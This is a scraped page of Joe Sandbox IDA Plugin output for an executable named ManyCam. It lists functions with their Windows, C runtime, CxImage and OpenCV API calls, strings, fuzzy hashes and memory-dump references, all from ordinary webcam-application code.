Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: DownSobel
String ID:
API String ID: 2091289516-0
Opcode ID: 608739ef99aa2b8ac6037748a2c71a64cfb87480d08a35d0b3f2b324fed52bd1
Instruction ID: b26035920ab24ae20490de8e438dd73d2ed62edcb4c8bde505a6cb4d7121f0fe
Opcode Fuzzy Hash: 608739ef99aa2b8ac6037748a2c71a64cfb87480d08a35d0b3f2b324fed52bd1
Instruction Fuzzy Hash: 46215EB5700701ABD724DE28DD81F67B7E9BB88711F448929FA869B6D0C671F5018B10

Function 0050DF50 Relevance: 6.1, APIs: 4, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0050DF91
_DebugHeapAllocator.LIBCPMTD ref: 0050DFAD

Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4E3
Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4FF

?Decode@CxImage@@QAE_NPAEKK@Z.CXIMAGECRT(?,?,00000000,?,?,?,?), ref: 0050DFFE
??3@YAXPAX@Z.MSVCR80(000000FF,?,?,00000000,?,?,?,?), ref: 0050E00D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$??3@Decode@Image@@
String ID:
API String ID: 2750522454-0
Opcode ID: 769ab098ef2205272df9c02d6f4271a03703872ce89b94fc88ef9a4cb5e21456
Instruction ID: 3c37372c448fd1ff81ab42699f4e176843c1d29902be1aeb85d09944e11fd3e7
Opcode Fuzzy Hash: 769ab098ef2205272df9c02d6f4271a03703872ce89b94fc88ef9a4cb5e21456
Instruction Fuzzy Hash: 9B3118B1D05248EFCB04DFA8D985BDEBBB4FB48314F10861DF815A7281DB746A04CBA5

Function 00446480 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 0044648F
GetWindow.USER32(00000000,00000002), ref: 004464A0
SendMessageW.USER32(00000000,?,?,?), ref: 004464BF
GetTopWindow.USER32(00000000), ref: 004464CF

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 0fc2dd0073c28b6c66ec9f54719fca97d74c0b9b452a9e8b98ab4c061e3703d5
Instruction ID: 5599d8aec985cfa69e8589d1268fc08193e69a2bbc754be235a44f600a99598a
Opcode Fuzzy Hash: 0fc2dd0073c28b6c66ec9f54719fca97d74c0b9b452a9e8b98ab4c061e3703d5
Instruction Fuzzy Hash: 9411FA75A00208FFDB04DFE8D944EAE77B9AB88300F10855EFA0697390D734AE05DB69

Function 00491B50 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,000000FF,?,0048E333,0048B283,00495099,?,0048B283,000000FF,000000FF,00495099,744843B1,00531700,000000FF,?,00495099), ref: 00491B68
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,000000FF,?,0048E333,0048B283,00495099,?,0048B283,000000FF,000000FF,00495099,744843B1,00531700,000000FF,?,00495099), ref: 00491B83
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,0048E333,0048B283,00495099,?,0048B283,000000FF,000000FF,00495099,744843B1,00531700,000000FF,?,00495099,?), ref: 00491BA9
_invalid_parameter_noinfo.MSVCR80(?,0048E333,0048B283,00495099,?,0048B283,000000FF,000000FF,00495099,744843B1,00531700,000000FF,?,00495099,?), ref: 00491BB3

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Myptr@?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@_invalid_parameter_noinfo
String ID:
API String ID: 2188846742-0
Opcode ID: cf415323ecff6b965b9dcc6927c72044f43967f3e5d630dff8fedc2412618fef
Instruction ID: 54e63703126b4be510269095b0d1381d719784210473edfb5369c30f1e79e64e
Opcode Fuzzy Hash: cf415323ecff6b965b9dcc6927c72044f43967f3e5d630dff8fedc2412618fef
Instruction Fuzzy Hash: 1C11C634A0000ADFCF14DF58C694CADBBB2EF99315B2182A9E9055B361EB34BF45DB84

Function 00475460 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteDC.GDI32(00000000), ref: 00475479
DeleteObject.GDI32(00000000), ref: 0047548F
??3@YAXPAX@Z.MSVCR80(00000001,?), ref: 004754AB
memset.MSVCR80 ref: 004754E6

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Delete$??3@Objectmemset
String ID:
API String ID: 2240089121-0
Opcode ID: f775acb041dbfe5c56a33f25cd465f9aa31629570cacb76639abf9799f9fa6fa
Instruction ID: 33d3a3a66d25ed9f4d03f09c9153b39c32194220fa2733effb8460e3d87a6c1a
Opcode Fuzzy Hash: f775acb041dbfe5c56a33f25cd465f9aa31629570cacb76639abf9799f9fa6fa
Instruction Fuzzy Hash: 55112AB4A00208EFDB44DF94D888B9EBBB1FF84315F548098D9052B391D779EA85CF80

Function 004223E0 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 00422406

Part of subcall function 004232A0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004232B6

wcslen.MSVCR80 ref: 00422427
SendMessageW.USER32(?,0000104D,00000000,00000000), ref: 00422448
SendMessageW.USER32(?,0000100F,?,00000000), ref: 00422460

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: MessageSend$memsetwcslen
String ID:
API String ID: 1629969563-0
Opcode ID: 27b4e246d41088bd54c352e73dc6f3ec4014a33d544db1ace6c82cc66d73829c
Instruction ID: fd28faf10420b3e9cf0d4e7cd47fee78e406ddaa3a8982db2d9a389e17546391
Opcode Fuzzy Hash: 27b4e246d41088bd54c352e73dc6f3ec4014a33d544db1ace6c82cc66d73829c
Instruction Fuzzy Hash: F901E9B1D00208EBEB14DFD0EC8ABDEBBB5BB58704F044118F601AB391DB75A9058B95

Function 00403340 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

cvCreateMat.CXCORE099(00000004,00000004,00000005,00000000,00401253,?,?), ref: 00403347
cvCreateImage.CXCORE099(?,?,00000008,00000001,00401253,?,?), ref: 00403366
cvReleaseMat.CXCORE099(000000A4,00401253,?,?), ref: 0040337A
cvReleaseImage.CXCORE099(000000A0,00401253,?,?), ref: 00403388

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CreateImageRelease
String ID:
API String ID: 3144300847-0
Opcode ID: ffbb64d3606a58d76dd273cbc426d93207a52b513e33f185116b626fbda38bd7
Instruction ID: 4452188ac5ececaf9476ffc26b46a09e5286b645042c6e493afe79c57806edd9
Opcode Fuzzy Hash: ffbb64d3606a58d76dd273cbc426d93207a52b513e33f185116b626fbda38bd7
Instruction Fuzzy Hash: 9DF0E0B5500312B6E7206F146C4AB9B7B94AF52301F040425FE44652C0FB749991C656

Function 005212D0 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,004BA301,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 005212D9
LeaveCriticalSection.KERNEL32(?,?,?,?,004BA301,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 005212E6
CreateThread.KERNEL32(00000000,00000000,00521280,?,00000000,00000000), ref: 00521303
LeaveCriticalSection.KERNEL32(?,?,?,?,004BA301,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00521311

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CriticalSection$Leave$CreateEnterThread
String ID:
API String ID: 2283434278-0
Opcode ID: 418f5b227edb57f9a6f757c2f81d22d4be826a1a10dd088fbaa45c80337aa0d5
Instruction ID: 8814811c4dcae3b6cb02d0e2ce8d72e62d21bf38926ec32fb9567c6bbb799682
Opcode Fuzzy Hash: 418f5b227edb57f9a6f757c2f81d22d4be826a1a10dd088fbaa45c80337aa0d5
Instruction Fuzzy Hash: 01F03E72201610AAE3705B55FC08BD77BB8EFD1B62F10051EF106D15D0D7A06445D765

Function 0041E370 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004E), ref: 0041E37B
GetSystemMetrics.USER32(0000004F), ref: 0041E386
GetSystemMetrics.USER32(0000004C), ref: 0041E391
GetSystemMetrics.USER32(0000004D), ref: 0041E3A2

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 22b1d73353d5bc3e7bbfce1216fdfc9bbe2c5f0851a8470d3ca0ef857e634515
Instruction ID: 0309d501508c84c491e30ef2097f10fb6b95fe06418acfa07dbdd42ca1e239de
Opcode Fuzzy Hash: 22b1d73353d5bc3e7bbfce1216fdfc9bbe2c5f0851a8470d3ca0ef857e634515
Instruction Fuzzy Hash: 69018078E00209AFE704DF94E8499ACBBB1FF58300F1482AAEE5997781DB702A54DB45

Function 00488730 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,00488724,744843B1,0049A100,744843AD,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?,?), ref: 00488737
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,00488724,744843B1,0049A100,744843AD,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?,?,0049A100), ref: 00488742
?erase@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@II@Z.MSVCP80(00000000,?,?,00488724,744843B1,0049A100,744843AD,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?), ref: 00488759
??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@ABV01@@Z.MSVCP80(?,?,?,00488724,744843B1,0049A100,744843AD,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?), ref: 00488766

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$Myptr@?$basic_string@_$??4?$basic_string@_?erase@?$basic_string@_V01@V01@@V12@
String ID:
API String ID: 3537912873-0
Opcode ID: 5056e8f042ebb5b06e388abe9d7013084b117bbf253dc20301d42485009f9af0
Instruction ID: 68c4d93e9c4a580dced358607109a40fa72366f08dc93a0fa3c65411e4fd161c
Opcode Fuzzy Hash: 5056e8f042ebb5b06e388abe9d7013084b117bbf253dc20301d42485009f9af0
Instruction Fuzzy Hash: 6CE01235200108AFEB14EF54EC58D99777BFB98391F008125FA0A8B362DB30AD44DB94

Function 00435780 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

4NC, xrefs: 004357CB, 004359AB, 004357CE, 004359AE
4NC, xrefs: 0043598E, 004358D2

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID: 4NC$4NC
API String ID: 0-1717309502
Opcode ID: 636313644eab2cc9ed53f4b1fb6c7fe5ccbcacf0ac8ecf14d2ef5cb6642a3b42
Instruction ID: edff85f3833ba22acf9ab8710c3cb5385f553245e4d39bd84e7972ae7c9abc0b
Opcode Fuzzy Hash: 636313644eab2cc9ed53f4b1fb6c7fe5ccbcacf0ac8ecf14d2ef5cb6642a3b42
Instruction Fuzzy Hash: 93616D70900508DFDB08EFA6D896BEEBBB5BF44318F10452EE5166B2D1DB782945CB88

Function 0050DC80 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0050F800: _DebugHeapAllocator.LIBCPMTD ref: 0050F815

_DebugHeapAllocator.LIBCPMTD ref: 0050DCC9

Strings

_mAnnnYca@aM_, xrefs: 0050DDD5
MCE-, xrefs: 0050DEB2

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID: MCE-$_mAnnnYca@aM_
API String ID: 571936431-899104912
Opcode ID: f40b280ed1325e6bba48490bd75d2d284572e43d25bd79c82fdd87b9afc39f8c
Instruction ID: 1e720448ac6b5cb3d8f353a52fb492bd5fc10a5b1a629d097a1df7f28f5dd433
Opcode Fuzzy Hash: f40b280ed1325e6bba48490bd75d2d284572e43d25bd79c82fdd87b9afc39f8c
Instruction Fuzzy Hash: 03715A30905258CBEB24DB54CD64FADBBB6BF61304F1482D8D5096B2C2CB75AE84CF65

Function 004B3190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157comCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

OleCreatePropertyFrame.OLEAUT32(?,00000000,00000000,?,00000001,?,00000000,?,00000000,00000000,00000000), ref: 004B335F
CoTaskMemFree.OLE32(?,?,?,744843B1), ref: 004B337C

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CGraphMgr::ShowCameraProperties, xrefs: 004B31C1

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorCreateDebugFrameFreeHeapPropertyTask
String ID: CGraphMgr::ShowCameraProperties
API String ID: 2338886374-3071715877
Opcode ID: b892e083cea794b7bef9db6e71d19fafbfb14f69ee18f4ad05b9c8b3defac545
Instruction ID: 691d08390fa4834040d12ba73b1f3886b5f8bcf1a23ad6f21803c9f1b6b811bf
Opcode Fuzzy Hash: b892e083cea794b7bef9db6e71d19fafbfb14f69ee18f4ad05b9c8b3defac545
Instruction Fuzzy Hash: 7B611571904618DBDB14DF95CC95BEEB7B4BF48304F10419AE00AAB291DB786F84CFA4

Function 0050D9E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(0050E57A,00000000,744843B1), ref: 0050DA14
wcscat.MSVCR80 ref: 0050DA27

Part of subcall function 00500B70: ?fail@ios_base@std@@QBE_NXZ.MSVCP80(0050DAA4,00000000,00000002,00000000,00000020,00000040,00000001), ref: 00500B86

Part of subcall function 00500BF0: ?fail@ios_base@std@@QBE_NXZ.MSVCP80(?,?,0050DAB6,?,00000000,00000002,00000000,00000020,00000040,00000001), ref: 00500C04

Strings

zP, xrefs: 0050DB58, 0050DB5B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ?fail@ios_base@std@@$CreateDirectorywcscat
String ID: zP
API String ID: 2898546159-257844785
Opcode ID: 4f0b56061c965f2f2cf825f5a83e1c041622dd382fe08cce812f0975218b0ce2
Instruction ID: fef8abd74728a25b5cf643a3bcb35e4a0f4abb1658a775f4a695eedb0014710f
Opcode Fuzzy Hash: 4f0b56061c965f2f2cf825f5a83e1c041622dd382fe08cce812f0975218b0ce2
Instruction Fuzzy Hash: 7F414970A012189FDB24DB54CD56FAEBBB4BF84310F008299E2096B2D1DB70AE84CF51

Function 0041E140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00406640: GetDlgItem.USER32(?,00000000), ref: 00406651

Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A415
Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A437
Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A455
Part of subcall function 0041A3B0: _DebugHeapAllocator.LIBCPMTD ref: 0041A47D
Part of subcall function 0041A3B0: ?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,?,00000000,?,0053E990,?,?,?,?,?,\class.xml,?,?,?,data\images\), ref: 0041A530

Part of subcall function 0041DE10: ??_V@YAXPAX@Z.MSVCR80(0000001F,744843B1,?,?,?,0000001F,00000001,CameraDlg\btn_properties,00000000,?,000003EB), ref: 0041DE55

Part of subcall function 0040DA40: MoveWindow.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,?,?,00408A2E,0000006D,0000002D,00000157,00000017,00000001,00000000,?), ref: 0040DA61

Part of subcall function 0041AA40: GetWindowLongW.USER32(?,744843B1), ref: 0041AA51

Part of subcall function 0041E880: SetWindowLongW.USER32(744843B1,00000001,744843B1), ref: 0041E895

SetLayeredWindowAttributes.USER32(?,00000000,000000B2,00000002,000000EC,00000000,000000EC,0000000A,0000000A,0000002D,00000014,00000001,Apply the selection,button,00000000,744843B1), ref: 0041E1F1

Part of subcall function 0041E8B0: MoveWindow.USER32(?,?,00000000,?,00000000,00000001,-00000003,?,0041E25F,?,00000001,?,?), ref: 0041E8E7

Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004E), ref: 0041E37B
Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004F), ref: 0041E386
Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004C), ref: 0041E391
Part of subcall function 0041E370: GetSystemMetrics.USER32(0000004D), ref: 0041E3A2

Strings

Apply the selection, xrefs: 0041E19C
button, xrefs: 0041E18C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Window$AllocatorDebugHeapMetricsSystem$LongMove$AttributesImage@@ItemLayeredLoad@
String ID: Apply the selection$button
API String ID: 70508497-2603280126
Opcode ID: 325f42cf690be37cc5bd74bc9656fe42c8c439b5651ae68e07e9d9de847688b4
Instruction ID: 04a5c8e6f4919bc5989b0440a3589c8b02fa676512b2dbfed97fa3f5bca5e94e
Opcode Fuzzy Hash: 325f42cf690be37cc5bd74bc9656fe42c8c439b5651ae68e07e9d9de847688b4
